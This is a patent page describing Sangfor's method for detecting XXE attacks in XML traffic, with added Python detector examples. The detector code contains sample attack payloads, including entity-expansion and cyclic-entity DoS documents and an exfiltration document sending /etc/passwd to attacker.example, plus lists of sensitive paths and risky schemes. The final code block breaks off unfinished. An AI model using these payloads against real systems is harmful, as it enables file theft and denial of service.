CN113127862B - XXE attack detection method and device, electronic equipment and storage medium - Google Patents


Info

Publication number
CN113127862B
CN113127862B (application CN201911414859.6A)
Authority
CN
China
Prior art keywords
xxe
attack
xml document
analysis result
relation
Prior art date
Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
Active
Application number
CN201911414859.6A
Other languages
Chinese (zh)
Other versions
CN113127862A (en)
Inventor
张宏飞
黄忠强
文成龙
Current Assignee (The listed assignees may be inaccurate. Google has not performed a legal analysis and makes no representation or warranty as to the accuracy of the list.)
Sangfor Technologies Co Ltd
Original Assignee
Sangfor Technologies Co Ltd
Priority date (The priority date is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the date listed.)
Filing date
Publication date
Application filed by Sangfor Technologies Co Ltd
Priority to CN201911414859.6A
Publication of CN113127862A
Application granted
Publication of CN113127862B
Legal status: Active
Anticipated expiration

Classifications

    • G PHYSICS
    • G06 COMPUTING; CALCULATING OR COUNTING
    • G06F ELECTRIC DIGITAL DATA PROCESSING
    • G06F21/00 Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
    • G06F21/50 Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
    • G06F21/55 Detecting local intrusion or implementing counter-measures
    • G06F21/56 Computer malware detection or handling, e.g. anti-virus arrangements
    • G06F21/562 Static detection
    • G PHYSICS
    • G06 COMPUTING; CALCULATING OR COUNTING
    • G06F ELECTRIC DIGITAL DATA PROCESSING
    • G06F2221/00 Indexing scheme relating to security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
    • G06F2221/03 Indexing scheme relating to G06F21/50, monitoring users, programs or devices to maintain the integrity of platforms
    • G06F2221/033 Test or assess software

Abstract

The application discloses an XXE attack detection method. By carrying out syntax analysis on the XML document to be detected, the reference relations among the entities in the document are obtained, and whether an XXE attack exists in the document can then be judged from those reference relations. Compared with the prior art, in which XXE attacks can only be prevented by disabling the related parser functions, the scheme discovers XXE attacks by analysing the content of the XML document itself, so that the attacking parts of the document content can be prevented and handled in a targeted way while normal external entity calls still proceed, reducing the impact on the normal operation of the system. The application also discloses an XXE attack detection device, an electronic device and a readable storage medium, which have the same beneficial effects.

Description

XXE attack detection method and device, electronic equipment and storage medium
Technical Field
The present disclosure relates to the field of malicious content detection, and in particular to an XXE attack detection method and apparatus, an electronic device, and a readable storage medium.
Background
XXE is short for XML External Entity, or XML external entity injection. Through XML entities and keywords such as SYSTEM or PUBLIC, an XML parser can read data from a local file or a remote URI, so an attacker can supply a maliciously constructed value through an XML entity and have the processing program parse it. Where the system resolves external entities, an attacker who constructs malicious content can read arbitrary files, execute system commands (in some parser configurations), probe intranet ports, attack intranet websites, and so on.
In the narrow sense an XXE attack refers only to injection through an external entity, but as techniques have developed the attack modes have diversified, and several other kinds of attack delivered through XML-format documents are also commonly called XXE attacks, forming XXE attacks in the broad sense.
However, in the course of research the applicant found that the prior art lacks a suitable means of detecting XXE attacks; most approaches merely switch off the functions that can give rise to XXE through settings of the XML processor itself. Taking the PHP language as an example, calling libxml_disable_entity_loader(true) disables the loading of all external entities (the function is deprecated as of PHP 8.0, where external entity loading is disabled by default). This does prevent malicious external entity injection, but it also stops the references to legitimate external entities, which are part of the normal operation of the system, so normal operation is affected; prohibiting everything in this way is no different from breaking the system oneself.
Therefore, how to provide a scientific and reasonable XXE attack detection mode, so as to better discover and prevent XXE attacks, is a problem to be solved by those skilled in the art.
Disclosure of Invention
The purpose of the application is to provide an XXE attack detection method, an XXE attack detection device, an electronic device and a readable storage medium, so as to provide a scientific and reasonable XXE attack detection mode and better discover and prevent XXE attacks.
To achieve the above object, the present application first provides an XXE attack detection method, including:
acquiring an XML document to be detected;
carrying out syntax analysis on the XML document to obtain a syntax analysis result;
and detecting, according to the syntax analysis result, whether an XXE attack exists.
Optionally, carrying out syntax analysis on the XML document to obtain a syntax analysis result includes:
extracting the document type definition part from the XML document;
analysing the document type definition part with a syntax engine to obtain a syntax tree;
and obtaining the reference relations among the entities from the relations among the entities on the syntax tree, and taking the reference relations as the syntax analysis result.
Optionally, detecting whether an XXE attack exists according to the syntax analysis result includes:
extracting the reference relations among the entities from the syntax analysis result;
and detecting, according to the reference relations, whether a DoS attack of the XXE class exists.
Optionally, detecting according to the reference relations whether a DoS attack of the XXE class exists includes:
judging whether the reference relations contain a cyclic call among different entities;
if a cyclic call among different entities exists, determining that a cyclic call attack of the DoS class exists;
or alternatively,
judging whether the reference relations contain different entities that expand exponentially;
if different entities that expand exponentially exist, determining that an exponential expansion attack of the DoS class exists.
Optionally, detecting whether an XXE attack exists according to the syntax analysis result includes:
carrying out semantic analysis on the syntax analysis result to obtain a semantic analysis result;
restoring, according to the semantic analysis result, the real relation between the initial entity and the final entity;
screening the real relations to obtain the external call links, i.e. those containing an external call;
judging whether the external content corresponding to an external call link contains malicious content;
and if malicious content exists, determining that an external malicious content injection attack of the XXE class exists.
Optionally, acquiring the XML document to be detected includes:
acquiring all data files contained in the traffic to be detected;
and screening the content type field or the file header content of each data file to obtain the XML document to be detected.
Optionally, after an XXE attack is detected, the method further includes:
blocking all calls to the target entity detected as belonging to the XXE attack;
and reporting, through a preset path, attack prompt information containing the target entity.
To achieve the above object, the present application further provides an XXE attack detection device, including:
an acquisition unit for the XML document to be detected, used to acquire the XML document to be detected;
a syntax analysis unit, used to carry out syntax analysis on the XML document to obtain a syntax analysis result;
and an XXE attack detection unit, used to detect, according to the syntax analysis result, whether an XXE attack exists.
Optionally, the syntax analysis unit includes:
a document type definition part extraction subunit configured to extract a document type definition part from the XML document;
a parsing subunit, configured to parse the document type definition portion by using a syntax engine to obtain a syntax tree;
and a reference relation acquisition subunit, used to obtain the reference relations among the entities from the relations among the entities on the syntax tree, and to take the reference relations as the syntax analysis result.
Optionally, the XXE attack detection unit includes:
a reference relation extraction subunit, used to extract the reference relations among the entities from the syntax analysis result;
and a DoS attack presence detection subunit, used to detect, according to the reference relations, whether a DoS attack of the XXE class exists.
Optionally, the DoS attack presence detection subunit includes:
a cyclic call presence detection module, used to judge whether the reference relations contain a cyclic call among different entities;
and a cyclic call attack determination module, used to determine that a cyclic call attack of the DoS class exists when a cyclic call among different entities exists;
or alternatively,
an exponential expansion presence detection module, used to judge whether the reference relations contain different entities that expand exponentially;
and an exponential expansion attack determination module, used to determine that an exponential expansion attack of the DoS class exists when different entities that expand exponentially exist.
Optionally, the XXE attack detection unit includes:
a semantic analysis subunit, used to carry out semantic analysis on the syntax analysis result to obtain a semantic analysis result;
a true relationship restoring subunit, configured to restore according to the semantic analysis result to obtain a true relationship between the initial entity and the final entity;
an external call link screening subunit, configured to screen each real relationship to obtain an external call link that includes an external call;
a malicious content judging subunit, configured to judge whether malicious content exists in external content corresponding to the external call link;
an external malicious content injection attack determination subunit configured to determine that an external malicious content injection attack exists in the XXE attack when the malicious content exists.
Optionally, the acquisition unit for the XML document to be detected includes:
a data file acquisition subunit, used to acquire all data files contained in the traffic to be detected;
and an XML document screening subunit, used to screen the content type field or the file header content of each data file to obtain the XML document to be detected.
Optionally, the XXE attack detection device further includes:
a target entity call blocking unit, used to block, after an XXE attack is detected, all calls to the target entity detected as belonging to the XXE attack;
and an attack prompt information reporting unit, used to report, through a preset path, attack prompt information containing the target entity.
To achieve the above object, the present application further provides an electronic device, including:
a memory for storing an XXE attack detection program;
a processor for implementing the steps of the XXE attack detection method described above when executing the XXE attack detection program.
To achieve the above object, the present application further provides a readable storage medium on which an XXE attack detection program is stored; when executed by a processor, the XXE attack detection program implements the steps of the XXE attack detection method described above.
The XXE attack detection method provided by the application includes: acquiring an XML document to be detected; carrying out syntax analysis on the XML document to obtain a syntax analysis result; and detecting, according to the syntax analysis result, whether an XXE attack exists.
According to the XXE attack detection method provided by the application, the reference relations among all the entities in the XML document are obtained by carrying out syntax analysis on the XML document to be detected, so that whether an XXE attack exists in the document can be judged conveniently from those reference relations. Compared with the prior art, in which XXE attacks can only be prevented by disabling the related parser functions, the scheme discovers XXE attacks by normal analysis of the XML document content, so that the attacking parts of the document content can be prevented and handled in a targeted way while normal external entity calls still proceed, reducing the impact on the normal operation of the system. The application also provides an XXE attack detection device, an electronic device and a readable storage medium, which have the same beneficial effects and are not described again here.
Drawings
In order to more clearly illustrate the embodiments of the present application or the technical solutions in the prior art, the drawings that are required to be used in the embodiments or the description of the prior art will be briefly described below, and it is obvious that the drawings in the following description are only embodiments of the present application, and that other drawings may be obtained according to the provided drawings without inventive effort to a person skilled in the art.
Fig. 1 is a flowchart of an XXE attack detection method provided in an embodiment of the present application;
Fig. 2 is a flowchart of a method for carrying out syntax analysis on an XML document in the XXE attack detection method provided in an embodiment of the present application;
Fig. 3 is a flowchart of a method for detecting XXE attacks according to the syntax analysis result in the XXE attack detection method provided in an embodiment of the present application;
Fig. 4 is a flowchart of another method for detecting XXE attacks according to the syntax analysis result in the XXE attack detection method provided in an embodiment of the present application;
Fig. 5 is a flowchart of another XXE attack detection method provided in an embodiment of the present application;
Fig. 6 is a block diagram of an XXE attack detection device provided in an embodiment of the present application.
Detailed Description
The purpose of the application is to provide an XXE attack detection method, an XXE attack detection device, an electronic device and a readable storage medium, so as to provide a scientific and reasonable XXE attack detection mode and better discover and prevent XXE attacks.
For the purposes of making the objects, technical solutions and advantages of the embodiments of the present application more clear, the technical solutions of the embodiments of the present application will be clearly and completely described below with reference to the drawings in the embodiments of the present application, and it is apparent that the described embodiments are some embodiments of the present application, but not all embodiments. All other embodiments, which can be made by one of ordinary skill in the art without undue burden from the present disclosure, are within the scope of the present disclosure.
Example I
Referring to fig. 1, fig. 1 is a flowchart of an XXE attack detection method provided in an embodiment of the present application, which includes the following steps:
S101: acquiring an XML document to be detected;
This step aims to obtain the XML documents contained in the traffic to be detected.
XML stands for Extensible Markup Language, a markup language used to give electronic files a structure; an XML document is a file written in that language. Since an XXE attack can only be carried out with an XML document as its carrier, the XML documents must first be filtered out of all the traffic to be detected.
The XML documents to be detected can be screened out of all the traffic to be detected as follows:
acquiring all data files contained in the traffic to be detected;
and screening the content type field or the file header content of each data file to obtain the XML documents to be detected. The Content-Type field of an XML document is usually application/xml or text/xml, so judgement and screening can be based on that feature; at the same time, the header of an XML document is determined by the XML format requirements and usually begins with an XML declaration such as <?xml version="1.0"?> that conforms to the XML header declaration specification (the declaration is optional in XML 1.0, so a document may also begin directly with a DOCTYPE or with its root element). Of course, any other feature that uniquely identifies an XML document may likewise be used as the basis of the judgement, which is not specifically limited here.
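One way to implement the two screening criteria above, as an added example in Python that is not part of the patent's disclosure: it keeps the Content-Type check and the header check the text describes, and adds the handling a practitioner needs for real traffic (media type parameters such as charset, the +xml suffix of types like application/soap+xml, byte order marks, UTF-16 bodies, and documents that open with a DOCTYPE instead of a declaration). The function names and the sample traffic are assumptions constructed for the example.

```python
import re

XML_MEDIA_TYPES = {"application/xml", "text/xml"}
XML_DECL = re.compile(rb"^\s*<\?xml\s")          # the declaration that opens most XML documents


def is_xml_document(content_type, body):
    """S101 screening: judge one data file by its Content-Type field or by its header bytes."""
    if content_type:
        media = content_type.split(";", 1)[0].strip().lower()    # drop "; charset=..." parameters
        if media in XML_MEDIA_TYPES or media.endswith("+xml"):   # e.g. application/soap+xml
            return True
    head = body[:256]
    if head.startswith((b"\xff\xfe", b"\xfe\xff")):              # UTF-16 BOM: re-encode to compare
        head = head.decode("utf-16", errors="ignore").encode("utf-8")
    elif head.startswith(b"\xef\xbb\xbf"):                       # UTF-8 BOM
        head = head[3:]
    # The declaration is optional in XML 1.0; a document that can carry entity
    # declarations at all must have a DOCTYPE, so a header opening with one is accepted too.
    return bool(XML_DECL.match(head)) or head.lstrip().startswith(b"<!DOCTYPE")


def screen_traffic(files):
    """Return the (name, body) pairs that go on to syntax analysis (S102)."""
    return [(name, body) for name, content_type, body in files
            if is_xml_document(content_type, body)]


# Constructed sample traffic (not from the patent): (file name, Content-Type, body bytes).
SAMPLE_FILES = [
    ("order.xml", "application/xml; charset=utf-8", b'<?xml version="1.0"?><order/>'),
    ("soap.bin", "Application/SOAP+XML", b'<?xml version="1.0"?><Envelope/>'),
    ("bom.txt", "text/plain", b'\xef\xbb\xbf<?xml version="1.0"?><r/>'),
    ("utf16.txt", "application/octet-stream", '<?xml version="1.0"?><r/>'.encode("utf-16")),
    ("dtd.txt", "text/plain", b'<!DOCTYPE r [<!ENTITY e "x">]><r>&e;</r>'),
    ("data.json", "application/json", b'{"note": "<?xml version=\\"1.0\\"?>"}'),
    ("page.html", "text/html", b"<html><body>no xml here</body></html>"),
]
```

A document with neither a declaration nor a DOCTYPE is passed over by the header check; for this purpose that is acceptable, because entity declarations can only appear in a DOCTYPE, so such a document cannot carry an XXE payload, and the Content-Type check still catches it when the server labels it as XML.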
S102: carrying out syntax analysis on the XML document to obtain a syntax analysis result;
On the basis of S101, this step aims at carrying out syntax analysis on the XML document obtained by screening, so as to obtain a syntax analysis result that facilitates the subsequent judgement of whether an XXE attack exists.
The syntax analysis of the XML document in this step aims to extract the entities contained in the document and the reference relations between them. For example, entity A references entity B and entity C references entity D; each entity has its own interpretation (replacement text), and the references between entities exist so that those interpretations can be reused. Taking the text <!ENTITY name 'John'> as an example, syntax analysis yields that this string defines a DTD entity whose name is name and whose content is the character string 'John'.
The extraction of the reference relations between the entities by syntax analysis can be implemented in various ways; one implementation, without limitation, is shown in the flowchart of fig. 2 and includes the following steps:
S201: extracting the document type definition part from the XML document;
The document type definition part is commonly referred to by practitioners as the DTD part, DTD being the abbreviation of Document Type Definition. The DTD part defines the legal building blocks of an XML document and contains the DTD entities (a DTD entity is a variable that defines a shortcut for referencing common text or special characters; it can be declared internally or reference external content). Alongside the DTD, the XML family of specifications also includes the Extensible Stylesheet Language (XSL), the style sheet language of XML, and the Extensible Linking Language (XLL, which became XLink).
S202: analysing the document type definition part with a syntax engine to obtain a syntax tree;
On the basis of S201, this step aims to parse the content of the DTD part with the syntax engine, thereby obtaining a syntax tree as the parsing result.
S203: obtaining the reference relations among the entities from the relations among the entities on the syntax tree, and taking the reference relations as the syntax analysis result.
On the basis of S202, this step aims to obtain the reference relations between the DTD entities from the hierarchical relations between the DTD entities presented on the syntax tree.
S103: detecting, according to the syntax analysis result, whether an XXE attack exists.
On the basis of S102, this step aims to detect whether an XXE attack exists according to the syntax analysis result obtained. Starting from the reference relations between the DTD entities contained in the syntax analysis result, most mainstream XXE attacks can be detected by different processing: the DoS subclass of XXE attacks can be detected directly from the reference relations, while for attacks such as the injection of malicious content through an external entity the reference relations are further processed and restored into the interpretation relation between the source entity and the final entity, which makes that detection convenient.
Further, if the detection in S103 determines that the XML document contains an XXE attack, all calls to the target entity detected as belonging to the XXE attack can be blocked in time, and preferably attack prompt information containing the target entity is also reported through a preset path so that it can be handled promptly, preventing the XXE attack from entering the network and causing harm. Specifically, the preset path may include an interface pop-up window, e-mail, SMS, and various instant messaging applications.
Based on the XXE attack detection scheme provided by this embodiment, the application obtains the reference relations among the entities in the XML document by carrying out syntax analysis on the XML document to be detected, so that whether an XXE attack exists in the document can be judged conveniently from those reference relations. Compared with the prior art, in which XXE attacks can only be prevented by disabling the related parser functions, the scheme discovers XXE attacks by normal analysis of the XML document content, so that the attacking parts of the document content can be prevented and handled in a targeted way while normal external entity calls still proceed, reducing the impact on the normal operation of the system.
Example II
On the basis of the first embodiment, this embodiment provides, for S103, a way of judging from the syntax analysis result whether the XML document contains a DoS subclass attack of the XXE class; referring to the flowchart shown in fig. 3, it includes the following steps:
S301: extracting the reference relations among the entities from the syntax analysis result;
S302: detecting, according to the reference relations, whether a DoS attack of the XXE class exists.
DoS is short for Denial of Service, and an attack that causes a denial of service is called a DoS attack; its purpose is to prevent a computer or network from providing normal service. The most common DoS attacks are network bandwidth attacks and connectivity attacks. A DoS attack deliberately exploits defects in the implementation of a network protocol, or directly exhausts the resources of the attacked object by brute force, so that the target computer or network cannot provide normal service or resource access and the target system stops responding or even crashes; such an attack does not involve intruding into the target server or network device. The resources concerned include network bandwidth, file system capacity, open processes, and permitted connections. An attack of this kind causes resource exhaustion, and its consequences cannot be avoided however fast the processor, however large the memory and however fast the network bandwidth of the target.
There are several DoS attacks that can be carried out through the reference relations, of which cyclic calls and exponential expansion are the most common. A cyclic call can be understood simply as: entity A calls entity B, and entity B in turn calls entity A, so that once the cyclic call occurs the calling operation continues without end, producing an infinite loop that causes the network device to report errors, go down, and so on. Exponential expansion can be understood simply as: one entity calls another entity several times. Taking two calls as an example, entity A calls entity B twice, e.g. <!ENTITY A "&B;&B;">, entity B calls entity C twice, and entity C calls entity D twice; this occupies a large amount of computing resources, and as the calls keep expanding all computing resources are eventually exhausted, so that the network device hangs and hardware may even be damaged.
The two cases can be detected by the following two operations respectively:
Cyclic call detection: judging whether the reference relations contain a cyclic call among different entities; if a cyclic call among different entities exists, determining that a cyclic call attack of the DoS class exists.
Exponential expansion detection: judging whether the reference relations contain different entities that expand exponentially; if such entities exist, determining that an exponential expansion attack of the DoS class exists. Specifically, the threshold for exponential expansion detection can be set according to the actual situation and the required discrimination accuracy, for example to 3 layers, so that a reference relation whose exponential expansion reaches that depth is judged to be an exponential expansion attack.
Further, in addition to the above cases that can be identified as XXE attacks, other cases can be identified by further strategies: whether the length of a variable name or value is excessive (an over-long name or value may make the XML document unrecognisable, or cause the recognition mechanism to report errors and crash), and whether the number of entity references is excessive; both of these are also forms of DoS subclass attack.
Example III
On the basis of the first embodiment, this embodiment provides, for S103, a way of judging from the syntax analysis result whether the XML document contains malicious content that attempts to carry out an attack by external injection, the injection subclass of XXE; referring to the flowchart shown in fig. 4, it includes the following steps:
S401: carrying out semantic analysis on the syntax analysis result to obtain a semantic analysis result;
S402: restoring, according to the semantic analysis result, the real relation between the initial entity and the final entity;
Semantic analysis is an analysis mode built on the preceding syntax analysis. It aims to interpret and restore, in the order of the references, the reference relations among the entities extracted by syntax analysis, and finally to obtain the real relation between the initial entity and the final entity.
Taking the text <!ENTITY name 'John'> and <!ENTITY greeting 'This is &name;'> as an example: <!ENTITY name 'John'> defines an entity named name whose interpretation is John, and <!ENTITY greeting 'This is &name;'> defines an entity named greeting that references the entity name, so that the interpretation of name is appended after 'This is '; semantic analysis therefore finally yields that the real relation of the entity greeting is 'This is John'. In practice the references between entities can be extremely complex, and attackers often use this to hide the actual content of an entity. Restoring the malicious content hidden in the data packet in this way facilitates the subsequent detection.
S403: screening the real relations to obtain the external call links, i.e. those containing an external call;
On the basis of S402, the real relations restored by semantic analysis show at a glance whether a relation contains an external call, and this step aims to screen each real relation and obtain the external call links that contain an external call.
S404: judging whether the external content corresponding to the external call link contains malicious content; if so, executing S405, otherwise executing S406;
S405: determining that an external malicious content injection attack of the XXE class exists;
S406: determining that no external malicious content injection attack of the XXE class exists.
S404 to S406 associate the external call link with the external content it points to, and judge from that content whether the external call is an attempt to inject malicious content through XXE. Specifically, the judgement of malicious content can be made in various ways, for example by features (signatures) or by website domain names, which are not described in detail here.
Further, in addition to the above discrimination mechanism based on the external call links, it may also be judged, on the basis of the restored real relations, whether an entity references internal sensitive files (corresponding to the illegal access class of XXE); if an entity is found to reference internal sensitive files that should not be referenced, this can also be regarded, to some extent, as an XXE attack.
Furthermore, in order to avoid false alarms caused by inaccurate discrimination as far as possible, a false alarm elimination mechanism can be added, for example using a library of legitimate domain names to judge the legitimacy of the domain name in a suspected XXE attack. When a false alarm occurs it can be eliminated by adding the domain name to the whitelist in that library. The false alarm elimination mechanism helps to control the false alarms of the whole XXE attack detection mechanism and reduces the impact on the customer's business systems.
At the same time, considering that attack techniques are continuously being improved and rewritten, the features used as discrimination criteria can also be processed by a deep learning or machine learning algorithm, so that simply adjusted attacks of the same type can be recognised conveniently.
To make the scheme easier to understand, the application also provides a complete flowchart of XXE attack detection and handling, shown in fig. 5. First, XML documents are identified in the traffic to be detected; syntax analysis and then semantic analysis are carried out on them; on the basis of the final analysis result, the XML documents are divided into black and white XML documents under the detection of the black-judging strategy (i.e. the judgement of which XXE attacks exist; 'black' refers to malicious content and 'white' to the normal content opposed to it); the black XML documents are intercepted so that they cannot enter the network and cause harm, and the white XML documents are released so that the normal content can be processed.
Because of the complexity of the situations involved, they cannot be illustrated one by one; those skilled in the art will recognise that, in combination with actual situations, many further examples exist according to the basic principles of the method provided herein, and these are within the scope of the present application without significant inventive effort.
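The following added example in Python, which is not the patent's or Sangfor's code, carries the DTD-level steps of Examples II and III through in one piece: parse_dtd extracts the entity declarations and their reference graph (S201 to S203), find_cycle and expansion_layers implement the two DoS checks of Example II, restore carries out the semantic restoration of Example III (S401 to S403) and records the external call links met on the way, judge_link applies the sensitive-file and legitimate-domain criteria of S404 and of the false alarm paragraph, and detect_xxe combines them into the black/white verdict of fig. 5. The regular-expression parser, the lists of sensitive paths and risky URI schemes, the three-layer threshold and the four sample documents are assumptions made for the example; the parser handles entity declarations only (element and attribute-list declarations are ignored), re-scans parameter-entity values for nested declarations because that is how out-of-band exfiltration payloads hide their external call, and never fetches the external content itself.

```python
import re
from collections import namedtuple
from urllib.parse import urlparse
QUOTED = r'"[^"]*"|\'[^\']*\''
ENTITY_DECL = re.compile(  # <!ENTITY [%] name ( SYSTEM "uri" | PUBLIC "id" "uri" | "text" )>
    rf'<!ENTITY\s+(?P<param>%\s*)?(?P<name>[\w.\-:]+)\s+'
    rf'(?P<body>SYSTEM\s+(?:{QUOTED})|PUBLIC\s+(?:{QUOTED})\s+(?:{QUOTED})|{QUOTED})\s*>')
REF = re.compile(r'([&%])([\w.\-:]+);')            # &name; or %name; (char refs &#..; excluded)
SENSITIVE_PATHS = ("/etc/passwd", "/etc/shadow", "/proc/self/", "win.ini", ".ssh/")   # assumed list
RISKY_SCHEMES = {"expect", "php", "jar", "gopher", "dict", "netdoc"}                   # assumed list
Entity = namedtuple("Entity", "value uri refs")  # internal text, external URI, referenced keys


def parse_dtd(doc):
    """S201-S203: extract the DTD entity declarations and build the reference graph (keys: name or %name)."""
    start, end = doc.find("<!DOCTYPE"), doc.find("]>")
    ents = {}
    for m in ENTITY_DECL.finditer(doc[start:end] if 0 <= start < end else doc):
        key, body = ("%" if m["param"] else "") + m["name"], m["body"]
        lit = [q[1:-1] for q in re.findall(QUOTED, body)][-1]          # the URI or the text
        refs = [("%" if k == "%" else "") + n for k, n in REF.findall(lit)]
        external = body.startswith(("SYSTEM", "PUBLIC"))
        ents[key] = Entity("", lit, refs) if external else Entity(lit, None, refs)
    for key, e in list(ents.items()):    # declarations hidden inside a parameter entity's value:
        if key[0] == "%" and "<!ENTITY" in e.value:                    # the out-of-band XXE shape
            ents.update(parse_dtd(re.sub(r"&#(?:x25|37);", "%", e.value)))
    return ents


def find_cycle(ents, k=None, path=(), done=None):
    """Example II, cyclic-call detection: DFS that returns the loop as a key list, e.g. ['a', 'b', 'a']."""
    done = set() if done is None else done
    for start in (list(ents) if k is None else [k]):
        if start in path:
            return list(path[path.index(start):]) + [start]
        if start not in done:
            for r in (ents[start].refs if start in ents else ()):
                if cycle := find_cycle(ents, r, path + (start,), done):
                    return cycle
            done.add(start)
    return None


def expansion_layers(ents, k, memo=None):
    """Example II: longest chain where each entity references the next at least twice (Billion Laughs)."""
    memo = {} if memo is None else memo
    if k not in memo:
        memo[k] = float("inf")                    # provisional value: only seen if the chain loops
        refs = ents[k].refs if k in ents else []
        memo[k] = max((1 + expansion_layers(ents, r, memo)
                       for r in set(refs) if refs.count(r) >= 2), default=0)
    return memo[k]


def restore(ents, k, links, seen=(), budget=100_000):
    """S401-S403: substitute references until only text is left; external entities met go into links."""
    if k in seen:
        raise ValueError(f"cyclic reference through {k}")
    e = ents.get(k)
    if e is None:
        return "&" + k + ";"                      # undeclared reference, left as written
    if e.uri is not None:
        links.append((k, e.uri))
        return f"<external {e.uri}>"              # the content is not fetched in this example
    out = REF.sub(lambda m: restore(ents, ("%" if m[1] == "%" else "") + m[2],
                                    links, seen + (k,), budget), e.value)
    if len(out) > budget:
        raise ValueError(f"{k} expands past {budget} characters")
    return out


def judge_link(uri, allowed_hosts=()):
    """S404: the reason an external URI is judged malicious, or None if it looks legitimate."""
    u = urlparse(uri)
    scheme = u.scheme.lower() if len(u.scheme) > 1 else "file"     # 'C:\..' is a drive, not a scheme
    if scheme in RISKY_SCHEMES:
        return f"risky scheme {scheme}:"
    if scheme == "file":
        path = uri.replace("\\", "/").lower()
        return next((f"reads sensitive local file {s}" for s in SENSITIVE_PATHS if s in path), None)
    host = (u.hostname or "").lower()             # legitimate domain library = allowed_hosts
    return None if host in {h.lower() for h in allowed_hosts} else f"fetches from host {host}"


def detect_xxe(doc, allowed_hosts=(), layers=3):
    """S103 over one document: DoS checks first, then the external-injection check; fig. 5's verdict."""
    ents, findings, links = parse_dtd(doc), [], []
    if cycle := find_cycle(ents):
        findings.append(("dos:cyclic-call", " -> ".join(cycle)))
    depth = max((expansion_layers(ents, k) for k in ents), default=0)
    if depth >= layers:                           # 3 layers: the threshold given in the text
        findings.append(("dos:exponential-expansion", f"{depth} layers"))
    if not findings:                              # a document judged a DoS payload is never expanded
        for k in ents:
            restore(ents, k, links)
    for name, uri in sorted(set(links)):
        if reason := judge_link(uri, allowed_hosts):
            findings.append(("xxe:external-injection", f"{name} -> {uri}: {reason}"))
    return findings


# Constructed sample documents (not taken from the patent).
BILLION_LAUGHS = ('<!DOCTYPE z [<!ENTITY lol "lol"><!ENTITY lol1 "&lol;&lol;&lol;">'
                  '<!ENTITY lol2 "&lol1;&lol1;&lol1;"><!ENTITY lol3 "&lol2;&lol2;&lol2;">]><z>&lol3;</z>')
LOOP = '<!DOCTYPE x [<!ENTITY a "&b;"><!ENTITY b "&a;">]><x>&a;</x>'
OOB_EXFIL = ('<!DOCTYPE d [<!ENTITY % file SYSTEM "file:///etc/passwd"><!ENTITY % eval '
             '"<!ENTITY &#x25; exfil SYSTEM \'http://attacker.example/?x=%file;\'>">%eval;%exfil;]><d/>')
BENIGN = ('<!DOCTYPE r [<!ENTITY legal SYSTEM "https://schemas.example.com/legal.xml">'
          '<!ENTITY title "Report">]><r>&title; &legal;</r>')
```

detect_xxe(BENIGN, allowed_hosts=("schemas.example.com",)) returns no findings, which is the whitelist case of the false alarm paragraph; without the allowlist the same document is reported. Expansion is bounded on purpose in two places: a document already judged to be a DoS payload is never restored, and restore refuses to grow past its budget, so the detector cannot itself become the victim of the attack it is looking for. A real deployment would pass the reported URIs to whatever content or domain classification is used for S404, and would replace the regular-expression parser with a proper DTD parser once conditional sections, comments and PUBLIC identifiers appear in the screened traffic.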
Referring to fig. 6, fig. 6 is a block diagram of an XXE attack detection device according to an embodiment of the present application, where the device may include:
an XML document to be detected acquisition unit 100 for acquiring an XML document to be detected;
a parsing unit 200, configured to parse the XML document to obtain a parsing result;
XXE attack detection unit 300 is configured to detect whether there is a XXE attack according to the parsing result.
The parsing unit 200 may include:
a document type definition part extraction subunit configured to extract a document type definition part from the XML document;
a parsing subunit, configured to parse the document type definition portion by using a syntax engine to obtain a syntax tree;
and the reference relation acquisition subunit is used for acquiring the reference relation between the entities according to the relation between the entities on the grammar tree, and taking the reference relation as the grammar analysis result.
The XXE attack detecting unit 300 may include:
a quotation relation extracting subunit, configured to extract, from the parsing result, a quotation relation between each entity;
and the DOS attack existence detection subunit is used for detecting whether the DOS attack in the XXE attack exists according to the reference relation.
Wherein the DOS attack presence detection subunit may include:
the cyclic call existence detection module is used for judging whether cyclic call among different entities exists in the reference relation;
the round-robin call attack determining module is used for determining that round-robin call attacks exist in the DOS attack when round calls among different entities exist;
or alternatively,
the index expansion existence detection module is used for judging whether different entities expanded according to the index exist in the quotation relation;
and the index expansion determining module is used for determining that the index expansion attack in the DOS attack exists when different entities which are expanded according to the index exist.
The XXE attack detecting unit 300 may include:
the semantic analysis subunit is used for carrying out semantic analysis on the grammar analysis result to obtain a semantic analysis result;
a true relationship restoring subunit, configured to restore according to the semantic analysis result to obtain a true relationship between the initial entity and the final entity;
an external call link screening subunit, configured to screen each real relationship to obtain an external call link that includes an external call;
a malicious content judging subunit, configured to judge whether malicious content exists in external content corresponding to the external call link;
an external malicious content injection attack determination subunit configured to determine that an external malicious content injection attack exists in the XXE attack when the malicious content exists.
The to-be-detected XML document acquisition unit 100 may include:
a data file obtaining subunit, configured to obtain all data files included in the flow to be detected;
and the XML document screening subunit is used for screening the content type field or the file header content of each data file to obtain the XML document to be detected.
Further, the XXE attack detection device may further include:
a target entity call masking unit for masking all calls detected as belonging to the target entity of the XXE attack after detecting the existence of the XXE attack;
and the attack prompt information reporting subunit is used for reporting the attack prompt information containing the target entity through a preset path.
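To make the flow of fig. 5 and the device of fig. 6 concrete, here is an added Python example written for this page; it is not the patent's or the applicant's code. It replaces the patent's syntax engine and syntax tree with a regular-expression scan of the internal DTD subset (an assumption and a simplification: external DTD subsets are not fetched, and only double-quoted declarations are handled). The trusted-domain set (the "legal domain name library"), the sensitive-path prefixes, the amplification threshold and the sample documents are all constructed for the demonstration.

```python
"""Toy XXE detector following the page's pipeline (added example, not the patent's code).
Stages: screen traffic for XML -> extract the internal DTD subset -> build the entity
reference graph -> DoS checks (cyclic calls, exponential expansion) -> resolve entity
chains to external call links -> judge links against policy -> black/white verdict."""
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlparse

# Constructed policy data: assumptions for this example, not values from the patent.
TRUSTED_DOMAINS = {"schemas.example.com"}          # the "legal domain name library"
SENSITIVE_PATH_PREFIXES = ("/etc/", "/proc/", "/root/")
MAX_AMPLIFICATION = 100   # expanded bytes per declared byte before we call it a DoS
DOCTYPE_RE = re.compile(r"<!DOCTYPE[^\[>]*\[(.*?)\]\s*>", re.DOTALL | re.IGNORECASE)
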